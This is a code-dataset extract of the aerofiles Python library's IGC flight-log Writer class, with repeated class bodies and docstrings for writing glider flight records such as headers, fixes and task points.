:param longitude: latitude of the last GPS fix
:param valid: ``True`` if the current GPS fix is 3D
:param pressure_alt: altitude to the ICAO ISA above the 1013.25 hPa
sea level datum
:param gps_alt: altitude above the WGS84 ellipsoid
:param extensions: a list of extension values according to previous
declaration through
:meth:`~aerofiles.igc.Writer.write_fix_extensions`
"""
if time is None:
time = datetime.datetime.utcnow()
record = self.format_time(time)
record += self.format_latitude(latitude)
record += self.format_longitude(longitude)
record += 'A' if valid else 'V'
record += '%05d' % (pressure_alt or 0)
record += '%05d' % (gps_alt or 0)
if self.fix_extensions or extensions:
if not (isinstance(extensions, list) and
isinstance(self.fix_extensions, list)):
raise ValueError('Invalid extensions list')
if len(extensions) != len(self.fix_extensions):
raise ValueError(
'Number of extensions does not match declaration')
for type_length, value in zip(self.fix_extensions, extensions):
length = type_length[1]
if isinstance(value, (int, float)):
value = ('%0' + str(length) + 'd') % value
if len(value) != length:
raise ValueError('Extension value has wrong length')
record += value
self.write_record('B', record)
def write_event(self, *args):
"""
Write an event record::
writer.write_event(datetime.time(12, 34, 56), 'PEV')
# -> B123456PEV
writer.write_event(datetime.time(12, 34, 56), 'PEV', 'Some Text')
# -> B123456PEVSome Text
writer.write_event('PEV') # uses utcnow()
# -> B121503PEV
:param time: UTC time of the fix record (default:
:meth:`~datetime.datetime.utcnow`)
:param code: event type as three-letter-code
:param text: additional text describing the event (optional)
"""
num_args = len(args)
if not (1 <= num_args <= 3):
raise ValueError('Invalid number of parameters received')
if num_args == 3:
time, code, text = args
elif num_args == 1:
code = args[0]
time = text = None
elif isinstance(args[0], (datetime.time, datetime.datetime)):
time, code = args
text = None
else:
code, text = args
time = None
if time is None:
time = datetime.datetime.utcnow()
if not patterns.THREE_LETTER_CODE.match(code):
raise ValueError('Invalid event code')
record = self.format_time(time)
record += code
if text:
record += text
self.write_record('E', record)
def write_satellites(self, *args):
"""
Write a satellite constellation record::
writer.write_satellites(datetime.time(12, 34, 56), [1, 2, 5, 22])
# -> F12345601020522
:param time: UTC time of the satellite constellation record (default:
:meth:`~datetime.datetime.utcnow`)
:param satellites: a list of satellite IDs as either two-character
strings or integers below 100
"""
num_args = len(args)
if num_args not in (1, 2):
raise ValueError('Invalid number of parameters received')
if num_args == 1:
satellites = args[0]
time = None
else:
time, satellites = args
if time is None:
time = datetime.datetime.utcnow()
record = self.format_time(time)
for satellite in satellites:
if isinstance(satellite, int):
satellite = '%02d' % satellite
if len(satellite) != 2:
raise ValueError('Invalid satellite ID')
record += satellite
self.write_record('F', record)
def write_k_record(self, *args):
"""
Write a K record::
writer.write_k_record_extensions([
('FXA', 3), ('SIU', 2), ('ENL', 3),
])
writer.write_k_record(datetime.time(2, 3, 4), ['023', 13, 2])
# -> J030810FXA1112SIU1315ENL
# -> K02030402313002
:param time: UTC time of the k record (default:
:meth:`~datetime.datetime.utcnow`)
:param extensions: a list of extension values according to previous
declaration through
:meth:`~aerofiles.igc.Writer.write_k_record_extensions`
"""
num_args = len(args)
if num_args not in (1, 2):
raise ValueError('Invalid number of parameters received')
if num_args == 1:
extensions = args[0]
time = None
else:
time, extensions = args
if time is None:
time = datetime.datetime.utcnow()
record = self.format_time(time)
if not (isinstance(extensions, list) and
isinstance(self.k_record_extensions, list)):
raise ValueError('Invalid extensions list')
if len(extensions) != len(self.k_record_extensions):
raise ValueError(
'Number of extensions does not match declaration')
for type_length, value in zip(self.k_record_extensions, extensions):
length = type_length[1]
if isinstance(value, (int, float)):
value = ('%0' + str(length) + 'd') % value
if len(value) != length:
raise ValueError('Extension value has wrong length')
record += value
self.write_record('K', record)
def write_comment(self, code, text):
"""
Write a comment record::
writer.write_comment('PLT', 'Arrived at the first turnpoint')
# -> LPLTArrived at the first turnpoint
:param code: a three-letter-code describing the source of the comment
(e.g. ``PLT`` for pilot)
:param text: the text that should be added to the comment
"""
if not patterns.THREE_LETTER_CODE.match(code):
raise ValueError('Invalid source')
self.write_record('L', code + text)
|
Turbo87/aerofiles | aerofiles/igc/writer.py | Writer.write_task_point | python | def write_task_point(self, latitude=None, longitude=None, text='',
distance_min=None, distance_max=None,
bearing1=None, bearing2=None):
latitude = self.format_latitude(latitude)
longitude = self.format_longitude(longitude)
record = latitude + longitude
if None not in [distance_min, distance_max, bearing1, bearing2]:
record += '%04d' % int(distance_min)
record += '%03d' % int((distance_min - int(distance_min)) * 1000)
record += '%04d' % int(distance_max)
record += '%03d' % int((distance_max - int(distance_max)) * 1000)
record += '%03d' % int(bearing1)
record += '%03d' % int((bearing1 - int(bearing1)) * 1000)
record += '%03d' % int(bearing2)
record += '%03d' % int((bearing2 - int(bearing2)) * 1000)
if text:
record += text
self.write_record('C', record) | Write a task declaration point::
writer.write_task_point(
latitude=(51 + 7.345 / 60.),
longitude=(6 + 24.765 / 60.),
text='Meiersberg',
)
# -> C5107345N00624765EMeiersberg
If no ``latitude`` or ``longitude`` is passed, the fields will be
filled with zeros (i.e. unknown coordinates). This however should only
be used for ``TAKEOFF`` and ``LANDING`` points.
For area tasks there are some additional parameters that can be used
to specify the relevant areas::
writer.write_task_point(
-(12 + 32.112 / 60.),
-(178 + .001 / 60.),
'TURN AREA',
distance_min=12.0,
distance_max=32.0,
bearing1=122.0,
bearing2=182.0,
)
# -> C1232112S17800001W00120000032000122000182000TURN AREA
:param latitude: latitude of the point (between -90 and 90 degrees)
:param longitude: longitude of the point (between -180 and 180 degrees)
:param text: type and/or name of the waypoint (e.g. ``TAKEOFF``,
``START``, ``TURN 1``, ``TURN 2``, ``FINISH`` or ``LANDING``) | train | https://github.com/Turbo87/aerofiles/blob/d8b7b04a1fcea5c98f89500de1164619a4ec7ef4/aerofiles/igc/writer.py#L552-L607 | [
"def format_latitude(self, value):\n return self.format_coordinate(\n value, default='0000000N', is_latitude=True)\n",
"def format_longitude(self, value):\n return self.format_coordinate(\n value, default='00000000E', is_latitude=False)\n",
"def write_record(self, type, record):\n self.wr... | class Writer:
"""
A writer for the IGC flight log file format.
"""
REQUIRED_HEADERS = [
'manufacturer_code',
'logger_id',
'date',
'logger_type',
'gps_receiver',
]
def __init__(self, fp=None):
self.fp = fp
self.fix_extensions = None
self.k_record_extensions = None
def format_date(self, date):
if isinstance(date, datetime.datetime):
date = date.date()
if isinstance(date, datetime.date):
date = date.strftime('%d%m%y')
if not patterns.DATE.match(date):
raise ValueError("Invalid date: " + date)
return date
def format_time(self, time):
if isinstance(time, datetime.datetime):
time = time.time()
if isinstance(time, datetime.time):
time = time.strftime('%H%M%S')
if not patterns.TIME.match(time):
raise ValueError("Invalid time: " + time)
return time
def format_coordinate(self, value, default=None, is_latitude=True):
if value is None:
return default
if is_latitude:
if not -90 <= value <= 90:
raise ValueError('Invalid latitude: %s' % value)
hemisphere = 'S' if value < 0 else 'N'
format = '%02d%05d%s'
else:
if not -180 <= value <= 180:
raise ValueError('Invalid longitude: %s' % value)
hemisphere = 'W' if value < 0 else 'E'
format = '%03d%05d%s'
value = abs(value)
degrees = int(value)
milliminutes = round((value - degrees) * 60000)
return format % (degrees, milliminutes, hemisphere)
def format_latitude(self, value):
return self.format_coordinate(
value, default='0000000N', is_latitude=True)
def format_longitude(self, value):
return self.format_coordinate(
value, default='00000000E', is_latitude=False)
def write_line(self, line):
self.fp.write((line + u'\r\n').encode('ascii', 'replace'))
def write_record(self, type, record):
self.write_line(type + record)
def write_logger_id(self, manufacturer, logger_id, extension=None,
validate=True):
"""
Write the manufacturer and logger id header line::
writer.write_logger_id('XXX', 'ABC', extension='FLIGHT:1')
# -> AXXXABCFLIGHT:1
Some older loggers have decimal logger ids which can be written like
this::
writer.write_logger_id('FIL', '13961', validate=False)
# -> AFIL13961
:param manufacturer: the three-letter-code of the manufacturer
:param logger_id: the logger id as three-letter-code
:param extension: anything else that should be appended to this header
(e.g. ``FLIGHT:1``)
:param validate: whether to validate the manufacturer and logger_id
three-letter-codes
"""
if validate:
if not patterns.MANUFACTURER_CODE.match(manufacturer):
raise ValueError('Invalid manufacturer code')
if not patterns.LOGGER_ID.match(logger_id):
raise ValueError('Invalid logger id')
record = '%s%s' % (manufacturer, logger_id)
if extension:
record = record + extension
self.write_record('A', record)
def write_header(self, source, subtype, value,
subtype_long=None, value_long=None):
if source not in ('F', 'O'):
raise ValueError('Invalid source: %s' % source)
if not subtype_long:
record = '%s%s%s' % (source, subtype, value)
elif not value_long:
record = '%s%s%s:%s' % (source, subtype, subtype_long, value)
else:
record = '%s%s%s%s:%s' % \
(source, subtype, value, subtype_long, value_long)
self.write_record('H', record)
def write_fr_header(self, subtype, value,
subtype_long=None, value_long=None):
self.write_header(
'F', subtype, value,
subtype_long=subtype_long, value_long=value_long
)
def write_date(self, date):
"""
Write the date header::
writer.write_date(datetime.date(2014, 5, 2))
# -> HFDTE140502
:param date: a :class:`datetime.date` instance
"""
self.write_fr_header('DTE', self.format_date(date))
def write_fix_accuracy(self, accuracy=None):
"""
Write the GPS fix accuracy header::
writer.write_fix_accuracy()
# -> HFFXA500
writer.write_fix_accuracy(25)
# -> HFFXA025
:param accuracy: the estimated GPS fix accuracy in meters (optional)
"""
if accuracy is None:
accuracy = 500
accuracy = int(accuracy)
if not 0 < accuracy < 1000:
raise ValueError('Invalid fix accuracy')
self.write_fr_header('FXA', '%03d' % accuracy)
def write_pilot(self, pilot):
"""
Write the pilot declaration header::
writer.write_pilot('Tobias Bieniek')
# -> HFPLTPILOTINCHARGE:Tobias Bieniek
:param pilot: name of the pilot
"""
self.write_fr_header('PLT', pilot, subtype_long='PILOTINCHARGE')
def write_copilot(self, copilot):
"""
Write the copilot declaration header::
writer.write_copilot('John Doe')
# -> HFCM2CREW2:John Doe
:param copilot: name of the copilot
"""
self.write_fr_header('CM2', copilot, subtype_long='CREW2')
def write_glider_type(self, glider_type):
"""
Write the glider type declaration header::
writer.write_glider_type('Hornet')
# -> HFGTYGLIDERTYPE:Hornet
:param glider_type: the glider type (e.g. ``Hornet``)
"""
self.write_fr_header('GTY', glider_type, subtype_long='GLIDERTYPE')
def write_glider_id(self, glider_id):
"""
Write the glider id declaration header::
writer.write_glider_id('D-4449')
# -> HFGIDGLIDERID:D-4449
The glider id is usually the official registration number of the
airplane. For example:``D-4449`` or ``N116EL``.
:param glider_id: the glider registration number
"""
self.write_fr_header('GID', glider_id, subtype_long='GLIDERID')
def write_gps_datum(self, code=None, gps_datum=None):
"""
Write the mandatory GPS datum header::
writer.write_gps_datum()
# -> HFDTM100GPSDATUM:WGS-1984
writer.write_gps_datum(33, 'Guam-1963')
# -> HFDTM033GPSDATUM:Guam-1963
Note that the default GPS datum is WGS-1984 and you should use that
unless you have very good reasons against it.
:param code: the GPS datum code as defined in the IGC file
specification, section A8
:param gps_datum: the GPS datum in written form
"""
if code is None:
code = 100
if gps_datum is None:
gps_datum = 'WGS-1984'
self.write_fr_header(
'DTM',
'%03d' % code,
subtype_long='GPSDATUM',
value_long=gps_datum,
)
def write_firmware_version(self, firmware_version):
"""
Write the firmware version header::
writer.write_firmware_version('6.4')
# -> HFRFWFIRMWAREVERSION:6.4
:param firmware_version: the firmware version of the flight recorder
"""
self.write_fr_header(
'RFW', firmware_version, subtype_long='FIRMWAREVERSION')
def write_hardware_version(self, hardware_version):
"""
Write the hardware version header::
writer.write_hardware_version('1.2')
# -> HFRHWHARDWAREVERSION:1.2
:param hardware_version: the hardware version of the flight recorder
"""
self.write_fr_header(
'RHW', hardware_version, subtype_long='HARDWAREVERSION')
def write_logger_type(self, logger_type):
"""
Write the extended logger type header::
writer.write_logger_type('Flarm-IGC')
# -> HFFTYFRTYPE:Flarm-IGC
:param logger_type: the extended type information of the flight
recorder
"""
self.write_fr_header('FTY', logger_type, subtype_long='FRTYPE')
def write_gps_receiver(self, gps_receiver):
"""
Write the GPS receiver header::
writer.write_gps_receiver('uBLOX LEA-4S-2,16,max9000m')
# -> HFGPSuBLOX LEA-4S-2,16,max9000m
:param gps_receiver: the GPS receiver information
"""
self.write_fr_header('GPS', gps_receiver)
def write_pressure_sensor(self, pressure_sensor):
"""
Write the pressure sensor header::
writer.write_pressure_sensor('Intersema MS5534B,8191')
# -> HFPRSPRESSALTSENSOR:Intersema MS5534B,8191
:param pressure_sensor: the pressure sensor information
"""
self.write_fr_header(
'PRS', pressure_sensor, subtype_long='PRESSALTSENSOR')
def write_competition_id(self, competition_id):
"""
Write the optional competition id declaration header::
writer.write_competition_id('TH')
# -> HFCIDCOMPETITIONID:TH
:param competition_id: competition id of the glider
"""
self.write_fr_header(
'CID', competition_id, subtype_long='COMPETITIONID')
def write_competition_class(self, competition_class):
"""
Write the optional competition class declaration header::
writer.write_competition_class('Club')
# -> HFCCLCOMPETITIONCLASS:Club
:param competition_class: competition class of the glider
"""
self.write_fr_header(
'CCL', competition_class, subtype_long='COMPETITIONCLASS')
def write_club(self, club):
"""
Write the optional club declaration header::
writer.write_club('LV Aachen')
# -> HFCLBCLUB:LV Aachen
:param club: club or organisation for which this flight should be
scored
"""
self.write_fr_header('CLB', club, subtype_long='CLUB')
def write_headers(self, headers):
"""
Write all the necessary headers in the correct order::
writer.write_headers({
'manufacturer_code': 'XCS',
'logger_id': 'TBX',
'date': datetime.date(1987, 2, 24),
'fix_accuracy': 50,
'pilot': 'Tobias Bieniek',
'copilot': 'John Doe',
'glider_type': 'Duo Discus',
'glider_id': 'D-KKHH',
'firmware_version': '2.2',
'hardware_version': '2',
'logger_type': 'LXNAVIGATION,LX8000F',
'gps_receiver': 'uBLOX LEA-4S-2,16,max9000m',
'pressure_sensor': 'INTERSEMA,MS5534A,max10000m',
'competition_id': '2H',
'competition_class': 'Doubleseater',
})
# -> AXCSTBX
# -> HFDTE870224
# -> HFFXA050
# -> HFPLTPILOTINCHARGE:Tobias Bieniek
# -> HFCM2CREW2:John Doe
# -> HFGTYGLIDERTYPE:Duo Discus
# -> HFGIDGLIDERID:D-KKHH
# -> HFDTM100GPSDATUM:WGS-1984
# -> HFRFWFIRMWAREVERSION:2.2
# -> HFRHWHARDWAREVERSION:2
# -> HFFTYFRTYPE:LXNAVIGATION,LX8000F
# -> HFGPSuBLOX LEA-4S-2,16,max9000m
# -> HFPRSPRESSALTSENSOR:INTERSEMA,MS5534A,max10000m
# -> HFCIDCOMPETITIONID:2H
# -> HFCCLCOMPETITIONCLASS:Doubleseater
This method will throw a :class:`ValueError` if a mandatory header is
missing and will fill others up with empty strings if no value was
given. The optional headers are only written if they are part of the
specified :class:`dict`.
.. admonition:: Note
The use of this method is encouraged compared to calling all the
other header-writing methods manually!
:param headers: a :class:`dict` of all the headers that should be
written.
"""
for header in self.REQUIRED_HEADERS:
if header not in headers:
raise ValueError('%s header missing' % header)
self.write_logger_id(
headers['manufacturer_code'],
headers['logger_id'],
extension=headers.get('logger_id_extension')
)
self.write_date(headers['date'])
self.write_fix_accuracy(headers.get('fix_accuracy'))
self.write_pilot(headers.get('pilot', ''))
if 'copilot' in headers:
self.write_copilot(headers['copilot'])
self.write_glider_type(headers.get('glider_type', ''))
self.write_glider_id(headers.get('glider_id', ''))
self.write_gps_datum(
code=headers.get('gps_datum_code'),
gps_datum=headers.get('gps_datum'),
)
self.write_firmware_version(headers.get('firmware_version', ''))
self.write_hardware_version(headers.get('hardware_version', ''))
self.write_logger_type(headers['logger_type'])
self.write_gps_receiver(headers['gps_receiver'])
self.write_pressure_sensor(headers.get('pressure_sensor', ''))
if 'competition_id' in headers:
self.write_competition_id(headers['competition_id'])
if 'competition_class' in headers:
self.write_competition_class(headers['competition_class'])
if 'club' in headers:
self.write_club(headers['club'])
def write_extensions(self, type, start_byte, extensions):
num_extensions = len(extensions)
if num_extensions >= 100:
raise ValueError('Too many extensions')
record = '%02d' % num_extensions
for extension, length in extensions:
if not patterns.EXTENSION_CODE.match(extension):
raise ValueError('Invalid extension: %s' % extension)
end_byte = start_byte + length - 1
record += '%02d%02d%s' % (start_byte, end_byte, extension)
start_byte = start_byte + length
self.write_record(type, record)
def write_fix_extensions(self, extensions):
"""
Write the fix extensions description header::
writer.write_fix_extensions([('FXA', 3), ('SIU', 2), ('ENL', 3)])
# -> I033638FXA3940SIU4143ENL
:param extensions: a list of ``(extension, length)`` tuples
"""
self.fix_extensions = extensions
self.write_extensions('I', 36, extensions)
def write_k_record_extensions(self, extensions):
"""
Write the K record extensions description header::
writer.write_k_record_extensions([('HDT', 5)])
# -> J010812HDT
Use :meth:`~aerofiles.igc.Writer.write_k_record` to write the
associated records.
:param extensions: a list of ``(extension, length)`` tuples
"""
self.k_record_extensions = extensions
self.write_extensions('J', 8, extensions)
def write_task_metadata(
self, declaration_datetime=None, flight_date=None,
task_number=None, turnpoints=None, text=None):
"""
Write the task declaration metadata record::
writer.write_task_metadata(
datetime.datetime(2014, 4, 13, 12, 53, 02),
task_number=42,
turnpoints=3,
)
# -> C140413125302000000004203
There are sensible defaults in place for all parameters except for the
``turnpoints`` parameter. If you don't pass that parameter the method
will raise a :class:`ValueError`. The other parameter defaults are
mentioned in the list below.
:param declaration_datetime: a :class:`datetime.datetime` instance of
the UTC date and time at the time of declaration (default: current
date and time)
:param flight_date: a :class:`datetime.date` instance of the intended
date of the flight (default: ``000000``, which means "use
declaration date")
:param task_number: task number for the flight date or an integer-based
identifier (default: ``0001``)
:param turnpoints: the number of turnpoints in the task (not counting
start and finish points!)
:param text: optional text to append to the metadata record
"""
if declaration_datetime is None:
declaration_datetime = datetime.datetime.utcnow()
if isinstance(declaration_datetime, datetime.datetime):
declaration_datetime = (
self.format_date(declaration_datetime) +
self.format_time(declaration_datetime)
)
elif not patterns.DATETIME.match(declaration_datetime):
raise ValueError('Invalid declaration datetime: %s' %
declaration_datetime)
if flight_date is None:
flight_date = '000000'
else:
flight_date = self.format_date(flight_date)
if task_number is None:
task_number = 1
elif not isinstance(task_number, int):
raise ValueError('Invalid task number: %s' % task_number)
if not isinstance(turnpoints, int):
raise ValueError('Invalid turnpoints: %s' % turnpoints)
record = '{0}{1}{2:04d}{3:02d}'.format(
declaration_datetime,
flight_date,
task_number,
turnpoints,
)
if text:
record += text
self.write_record('C', record)
def write_task_points(self, points):
"""
Write multiple task declaration points with one call::
writer.write_task_points([
(None, None, 'TAKEOFF'),
(51.40375, 6.41275, 'START'),
(50.38210, 8.82105, 'TURN 1'),
(50.59045, 7.03555, 'TURN 2', 0, 32.5, 0, 180),
(51.40375, 6.41275, 'FINISH'),
(None, None, 'LANDING'),
])
# -> C0000000N00000000ETAKEOFF
# -> C5124225N00624765ESTART
# -> C5022926N00849263ETURN 1
# -> C5035427N00702133E00000000032500000000180000TURN 2
# -> C5124225N00624765EFINISH
# -> C0000000N00000000ELANDING
see the :meth:`~aerofiles.igc.Writer.write_task_point` method for more
information.
:param points: a list of ``(latitude, longitude, text)`` tuples. use
``(latitude, longitude, text, distance_min, distance_max, bearing1,
bearing2)`` tuples for area task points.
"""
for args in points:
if len(args) not in [3, 7]:
raise ValueError('Invalid number of task point tuple items')
self.write_task_point(*args)
def write_security(self, security, bytes_per_line=75):
"""
Write the security signature::
writer.write_security('ABCDEF')
# -> GABCDEF
If a signature of more than 75 bytes is used the G record will be
broken into multiple lines according to the IGC file specification.
This rule can be configured with the ``bytes_per_line`` parameter if
necessary.
:param security: the security signature
:param bytes_per_line: the maximum number of bytes per line
(default: ``75``)
"""
for start in range(0, len(security), bytes_per_line):
self.write_record('G', security[start:start + bytes_per_line])
def write_fix(self, time=None, latitude=None, longitude=None, valid=False,
pressure_alt=None, gps_alt=None, extensions=None):
"""
Write a fix record::
writer.write_fix(
datetime.time(12, 34, 56),
latitude=51.40375,
longitude=6.41275,
valid=True,
pressure_alt=1234,
gps_alt=1432,
)
# -> B1234565124225N00624765EA0123401432
:param time: UTC time of the fix record (default:
:meth:`~datetime.datetime.utcnow`)
:param latitude: longitude of the last GPS fix
:param longitude: latitude of the last GPS fix
:param valid: ``True`` if the current GPS fix is 3D
:param pressure_alt: altitude to the ICAO ISA above the 1013.25 hPa
sea level datum
:param gps_alt: altitude above the WGS84 ellipsoid
:param extensions: a list of extension values according to previous
declaration through
:meth:`~aerofiles.igc.Writer.write_fix_extensions`
"""
if time is None:
time = datetime.datetime.utcnow()
record = self.format_time(time)
record += self.format_latitude(latitude)
record += self.format_longitude(longitude)
record += 'A' if valid else 'V'
record += '%05d' % (pressure_alt or 0)
record += '%05d' % (gps_alt or 0)
if self.fix_extensions or extensions:
if not (isinstance(extensions, list) and
isinstance(self.fix_extensions, list)):
raise ValueError('Invalid extensions list')
if len(extensions) != len(self.fix_extensions):
raise ValueError(
'Number of extensions does not match declaration')
for type_length, value in zip(self.fix_extensions, extensions):
length = type_length[1]
if isinstance(value, (int, float)):
value = ('%0' + str(length) + 'd') % value
if len(value) != length:
raise ValueError('Extension value has wrong length')
record += value
self.write_record('B', record)
def write_event(self, *args):
"""
Write an event record::
writer.write_event(datetime.time(12, 34, 56), 'PEV')
# -> B123456PEV
writer.write_event(datetime.time(12, 34, 56), 'PEV', 'Some Text')
# -> B123456PEVSome Text
writer.write_event('PEV') # uses utcnow()
# -> B121503PEV
:param time: UTC time of the fix record (default:
:meth:`~datetime.datetime.utcnow`)
:param code: event type as three-letter-code
:param text: additional text describing the event (optional)
"""
num_args = len(args)
if not (1 <= num_args <= 3):
raise ValueError('Invalid number of parameters received')
if num_args == 3:
time, code, text = args
elif num_args == 1:
code = args[0]
time = text = None
elif isinstance(args[0], (datetime.time, datetime.datetime)):
time, code = args
text = None
else:
code, text = args
time = None
if time is None:
time = datetime.datetime.utcnow()
if not patterns.THREE_LETTER_CODE.match(code):
raise ValueError('Invalid event code')
record = self.format_time(time)
record += code
if text:
record += text
self.write_record('E', record)
def write_satellites(self, *args):
"""
Write a satellite constellation record::
writer.write_satellites(datetime.time(12, 34, 56), [1, 2, 5, 22])
# -> F12345601020522
:param time: UTC time of the satellite constellation record (default:
:meth:`~datetime.datetime.utcnow`)
:param satellites: a list of satellite IDs as either two-character
strings or integers below 100
"""
num_args = len(args)
if num_args not in (1, 2):
raise ValueError('Invalid number of parameters received')
if num_args == 1:
satellites = args[0]
time = None
else:
time, satellites = args
if time is None:
time = datetime.datetime.utcnow()
record = self.format_time(time)
for satellite in satellites:
if isinstance(satellite, int):
satellite = '%02d' % satellite
if len(satellite) != 2:
raise ValueError('Invalid satellite ID')
record += satellite
self.write_record('F', record)
def write_k_record(self, *args):
"""
Write a K record::
writer.write_k_record_extensions([
('FXA', 3), ('SIU', 2), ('ENL', 3),
])
writer.write_k_record(datetime.time(2, 3, 4), ['023', 13, 2])
# -> J030810FXA1112SIU1315ENL
# -> K02030402313002
:param time: UTC time of the k record (default:
:meth:`~datetime.datetime.utcnow`)
:param extensions: a list of extension values according to previous
declaration through
:meth:`~aerofiles.igc.Writer.write_k_record_extensions`
"""
num_args = len(args)
if num_args not in (1, 2):
raise ValueError('Invalid number of parameters received')
if num_args == 1:
extensions = args[0]
time = None
else:
time, extensions = args
if time is None:
time = datetime.datetime.utcnow()
record = self.format_time(time)
if not (isinstance(extensions, list) and
isinstance(self.k_record_extensions, list)):
raise ValueError('Invalid extensions list')
if len(extensions) != len(self.k_record_extensions):
raise ValueError(
'Number of extensions does not match declaration')
for type_length, value in zip(self.k_record_extensions, extensions):
length = type_length[1]
if isinstance(value, (int, float)):
value = ('%0' + str(length) + 'd') % value
if len(value) != length:
raise ValueError('Extension value has wrong length')
record += value
self.write_record('K', record)
def write_comment(self, code, text):
"""
Write a comment record::
writer.write_comment('PLT', 'Arrived at the first turnpoint')
# -> LPLTArrived at the first turnpoint
:param code: a three-letter-code describing the source of the comment
(e.g. ``PLT`` for pilot)
:param text: the text that should be added to the comment
"""
if not patterns.THREE_LETTER_CODE.match(code):
raise ValueError('Invalid source')
self.write_record('L', code + text)
|
Turbo87/aerofiles | aerofiles/igc/writer.py | Writer.write_task_points | python | def write_task_points(self, points):
for args in points:
if len(args) not in [3, 7]:
raise ValueError('Invalid number of task point tuple items')
self.write_task_point(*args) | Write multiple task declaration points with one call::
writer.write_task_points([
(None, None, 'TAKEOFF'),
(51.40375, 6.41275, 'START'),
(50.38210, 8.82105, 'TURN 1'),
(50.59045, 7.03555, 'TURN 2', 0, 32.5, 0, 180),
(51.40375, 6.41275, 'FINISH'),
(None, None, 'LANDING'),
])
# -> C0000000N00000000ETAKEOFF
# -> C5124225N00624765ESTART
# -> C5022926N00849263ETURN 1
# -> C5035427N00702133E00000000032500000000180000TURN 2
# -> C5124225N00624765EFINISH
# -> C0000000N00000000ELANDING
see the :meth:`~aerofiles.igc.Writer.write_task_point` method for more
information.
:param points: a list of ``(latitude, longitude, text)`` tuples. use
``(latitude, longitude, text, distance_min, distance_max, bearing1,
bearing2)`` tuples for area task points. | train | https://github.com/Turbo87/aerofiles/blob/d8b7b04a1fcea5c98f89500de1164619a4ec7ef4/aerofiles/igc/writer.py#L609-L639 | [
"def write_task_point(self, latitude=None, longitude=None, text='',\n distance_min=None, distance_max=None,\n bearing1=None, bearing2=None):\n \"\"\"\n Write a task declaration point::\n\n writer.write_task_point(\n latitude=(51 + 7.345 / 60.),\n ... | class Writer:
"""
A writer for the IGC flight log file format.
"""
REQUIRED_HEADERS = [
'manufacturer_code',
'logger_id',
'date',
'logger_type',
'gps_receiver',
]
def __init__(self, fp=None):
self.fp = fp
self.fix_extensions = None
self.k_record_extensions = None
def format_date(self, date):
if isinstance(date, datetime.datetime):
date = date.date()
if isinstance(date, datetime.date):
date = date.strftime('%d%m%y')
if not patterns.DATE.match(date):
raise ValueError("Invalid date: " + date)
return date
def format_time(self, time):
if isinstance(time, datetime.datetime):
time = time.time()
if isinstance(time, datetime.time):
time = time.strftime('%H%M%S')
if not patterns.TIME.match(time):
raise ValueError("Invalid time: " + time)
return time
def format_coordinate(self, value, default=None, is_latitude=True):
if value is None:
return default
if is_latitude:
if not -90 <= value <= 90:
raise ValueError('Invalid latitude: %s' % value)
hemisphere = 'S' if value < 0 else 'N'
format = '%02d%05d%s'
else:
if not -180 <= value <= 180:
raise ValueError('Invalid longitude: %s' % value)
hemisphere = 'W' if value < 0 else 'E'
format = '%03d%05d%s'
value = abs(value)
degrees = int(value)
milliminutes = round((value - degrees) * 60000)
return format % (degrees, milliminutes, hemisphere)
def format_latitude(self, value):
return self.format_coordinate(
value, default='0000000N', is_latitude=True)
def format_longitude(self, value):
return self.format_coordinate(
value, default='00000000E', is_latitude=False)
def write_line(self, line):
self.fp.write((line + u'\r\n').encode('ascii', 'replace'))
def write_record(self, type, record):
self.write_line(type + record)
def write_logger_id(self, manufacturer, logger_id, extension=None,
validate=True):
"""
Write the manufacturer and logger id header line::
writer.write_logger_id('XXX', 'ABC', extension='FLIGHT:1')
# -> AXXXABCFLIGHT:1
Some older loggers have decimal logger ids which can be written like
this::
writer.write_logger_id('FIL', '13961', validate=False)
# -> AFIL13961
:param manufacturer: the three-letter-code of the manufacturer
:param logger_id: the logger id as three-letter-code
:param extension: anything else that should be appended to this header
(e.g. ``FLIGHT:1``)
:param validate: whether to validate the manufacturer and logger_id
three-letter-codes
"""
if validate:
if not patterns.MANUFACTURER_CODE.match(manufacturer):
raise ValueError('Invalid manufacturer code')
if not patterns.LOGGER_ID.match(logger_id):
raise ValueError('Invalid logger id')
record = '%s%s' % (manufacturer, logger_id)
if extension:
record = record + extension
self.write_record('A', record)
def write_header(self, source, subtype, value,
subtype_long=None, value_long=None):
if source not in ('F', 'O'):
raise ValueError('Invalid source: %s' % source)
if not subtype_long:
record = '%s%s%s' % (source, subtype, value)
elif not value_long:
record = '%s%s%s:%s' % (source, subtype, subtype_long, value)
else:
record = '%s%s%s%s:%s' % \
(source, subtype, value, subtype_long, value_long)
self.write_record('H', record)
def write_fr_header(self, subtype, value,
subtype_long=None, value_long=None):
self.write_header(
'F', subtype, value,
subtype_long=subtype_long, value_long=value_long
)
def write_date(self, date):
"""
Write the date header::
writer.write_date(datetime.date(2014, 5, 2))
# -> HFDTE140502
:param date: a :class:`datetime.date` instance
"""
self.write_fr_header('DTE', self.format_date(date))
def write_fix_accuracy(self, accuracy=None):
"""
Write the GPS fix accuracy header::
writer.write_fix_accuracy()
# -> HFFXA500
writer.write_fix_accuracy(25)
# -> HFFXA025
:param accuracy: the estimated GPS fix accuracy in meters (optional)
"""
if accuracy is None:
accuracy = 500
accuracy = int(accuracy)
if not 0 < accuracy < 1000:
raise ValueError('Invalid fix accuracy')
self.write_fr_header('FXA', '%03d' % accuracy)
def write_pilot(self, pilot):
"""
Write the pilot declaration header::
writer.write_pilot('Tobias Bieniek')
# -> HFPLTPILOTINCHARGE:Tobias Bieniek
:param pilot: name of the pilot
"""
self.write_fr_header('PLT', pilot, subtype_long='PILOTINCHARGE')
def write_copilot(self, copilot):
"""
Write the copilot declaration header::
writer.write_copilot('John Doe')
# -> HFCM2CREW2:John Doe
:param copilot: name of the copilot
"""
self.write_fr_header('CM2', copilot, subtype_long='CREW2')
def write_glider_type(self, glider_type):
"""
Write the glider type declaration header::
writer.write_glider_type('Hornet')
# -> HFGTYGLIDERTYPE:Hornet
:param glider_type: the glider type (e.g. ``Hornet``)
"""
self.write_fr_header('GTY', glider_type, subtype_long='GLIDERTYPE')
def write_glider_id(self, glider_id):
"""
Write the glider id declaration header::
writer.write_glider_id('D-4449')
# -> HFGIDGLIDERID:D-4449
The glider id is usually the official registration number of the
airplane. For example:``D-4449`` or ``N116EL``.
:param glider_id: the glider registration number
"""
self.write_fr_header('GID', glider_id, subtype_long='GLIDERID')
def write_gps_datum(self, code=None, gps_datum=None):
"""
Write the mandatory GPS datum header::
writer.write_gps_datum()
# -> HFDTM100GPSDATUM:WGS-1984
writer.write_gps_datum(33, 'Guam-1963')
# -> HFDTM033GPSDATUM:Guam-1963
Note that the default GPS datum is WGS-1984 and you should use that
unless you have very good reasons against it.
